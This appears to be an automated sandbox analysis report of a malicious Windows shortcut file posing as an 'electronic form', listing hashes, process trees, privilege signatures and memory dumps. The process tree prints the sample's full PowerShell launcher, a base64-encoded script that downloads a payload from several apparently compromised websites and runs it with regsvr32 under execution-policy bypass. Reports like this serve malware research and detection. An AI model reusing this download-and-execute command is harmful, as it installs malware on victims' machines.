cde9b766bf2966ed7f0396fee7e23fdb7246b534affd58f6d4caf50237ff110b

Resubmissions

26-04-2022 20:07

220426-ywbl8saabq 10

26-04-2022 19:59

220426-yqv4paebd5 10

Analysis

max time kernel
45s
max time network
49s
platform
windows7_x64
resource
win7-20220414-en
submitted
26-04-2022 19:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Electronic form 04.26.2022, USA.lnk
Size

2KB
MD5

e87c1ae2b8c7e85b6431d420310df80e
SHA1

683ab8df53a58982807ef65f3b68bb2bbab6fc6e
SHA256

cde9b766bf2966ed7f0396fee7e23fdb7246b534affd58f6d4caf50237ff110b
SHA512

c7959fed580f4e6096c345973fd2c19b049cf3e8539f391321a61fd4ff18fd4d7683cfb5534c38cf9ad9cc26cd99eb3a8f142b13b2430b761f78272b937e0c45

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

1772 powershell.exe
1076 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1772 powershell.exe
Token: SeDebugPrivilege 1076 powershell.exe

pid	process
1772	powershell.exe
1076	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1772	powershell.exe
Token: SeDebugPrivilege	1076	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 2028 wrote to memory of 1772	2028	cmd.exe	powershell.exe
PID 2028 wrote to memory of 1772	2028	cmd.exe	powershell.exe
PID 2028 wrote to memory of 1772	2028	cmd.exe	powershell.exe
PID 1772 wrote to memory of 1076	1772	powershell.exe	powershell.exe
PID 1772 wrote to memory of 1076	1772	powershell.exe	powershell.exe
PID 1772 wrote to memory of 1076	1772	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Electronic form 04.26.2022, USA.lnk"
1⤵
- Suspicious use of WriteProcessMemory
PID:2028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "Electronic form 04.26.2022, USA.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2htZW5nLmNvLnVrL2NnaS1iaW4vSC8iLCJodHRwczovL2Vkb3Jhc2VndXJvcy5jb20uYnIvY2dpLWJpbi9taDNNTUdLZmhYdEovIiwiaHR0cHM6Ly93d3cucmVuZWV0dGVuLm5sL01lbnUvWE5NaHg2blNubnBwOGFaemsvIiwiaHR0cDovL2JyZW5kYW5jbGVhcnkubmV0L2ltYWdlcy9vSUxFSnhPYjAyMU9naEdkeHMvIiwiaHR0cHM6Ly9iZW5jZXZlbmRlZ2hhei5odS93cC1pbmNsdWRlcy9pVVd2VU5xLyIsImh0dHA6Ly9hbmF0LWJhci5jby5pbC93cC1hZG1pbi9ENkxpczVDdHJNZHVyTS8iKTtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZW52OlRFTVAvd1p4cGNHaHFQeC5lcVo7UmVnc3ZyMzIuZXhlICRlbnY6VEVNUC93WnhwY0docVB4LmVxWjticmVha30gY2F0Y2ggeyB9fQ==')) > "C:\Users\Admin\AppData\Local\Temp\hgUQRrLvVK.ps1"; powershell -executionpolicy bypass -file "$env:TEMP/\hgUQRrLvVK.ps1"; Remove-Item "$env:TEMP/\hgUQRrLvVK.ps1" -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\Admin\AppData\Local\Temp/\hgUQRrLvVK.ps1
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1076

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\hgUQRrLvVK.ps1
Filesize
926B

MD5
8ef6909ba4b9e6cd6676297601c39e5c

SHA1
9dcd9af682adacb278c1970d49babafd29df3928

SHA256
9a9ba2e8478d73ec02ff4c0d2c30dc0e7fad0e54d16737875c2b60fcbcac727c

SHA512
b8f40c8d659c82034984d703ea1a6cf4cbcdb3039bf917e2d9eba391f910af860c1e154ebe1b1004532b0412fa5c39db554a54f7c1bb1ec32c0bfcf4eb6900b5

Download Submit
memory/1076-95-0x0000000000000000-mapping.dmp

Download
memory/1076-97-0x000007FEEEA70000-0x000007FEEF5CD000-memory.dmp

Filesize
11.4MB

Download
memory/1076-100-0x0000000002634000-0x0000000002637000-memory.dmp

Filesize
12KB

Download
memory/1076-98-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

Filesize
3.0MB

Download
memory/1076-102-0x000000000263B000-0x000000000265A000-memory.dmp

Filesize
124KB

Download
memory/1772-88-0x0000000000000000-mapping.dmp

Download
memory/1772-93-0x000007FEEEA70000-0x000007FEEF5CD000-memory.dmp

Filesize
11.4MB

Download
memory/1772-94-0x0000000002A04000-0x0000000002A07000-memory.dmp

Filesize
12KB

Download
memory/1772-99-0x0000000002A0B000-0x0000000002A2A000-memory.dmp

Filesize
124KB

Download
memory/2028-54-0x000007FEFC0C1000-0x000007FEFC0C3000-memory.dmp

Filesize
8KB

Download